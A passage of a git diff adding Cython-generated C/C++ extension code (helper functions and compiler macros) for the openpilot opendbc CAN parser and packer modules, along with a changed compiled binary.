rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ +#if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/opendbc/can/packer_pyx.so b/opendbc/can/packer_pyx.so index 023e3ed59..f34df6697 100755 Binary files a/opendbc/can/packer_pyx.so and b/opendbc/can/packer_pyx.so differ diff --git a/opendbc/can/parser_pyx.cpp b/opendbc/can/parser_pyx.cpp new file mode 100644 index 000000000..242ad015b --- /dev/null +++ b/opendbc/can/parser_pyx.cpp @@ -0,0 +1,16220 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [ + "opendbc/can/common.h", + "opendbc/can/common_dbc.h" + ], + "include_dirs": [ + "opendbc/can" + ], + "language": "c++", + "name": "opendbc.can.parser_pyx", + "sources": [ + "/data/openpilot/opendbc/can/parser_pyx.pyx" + ] + }, + "module_name": "opendbc.can.parser_pyx" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef 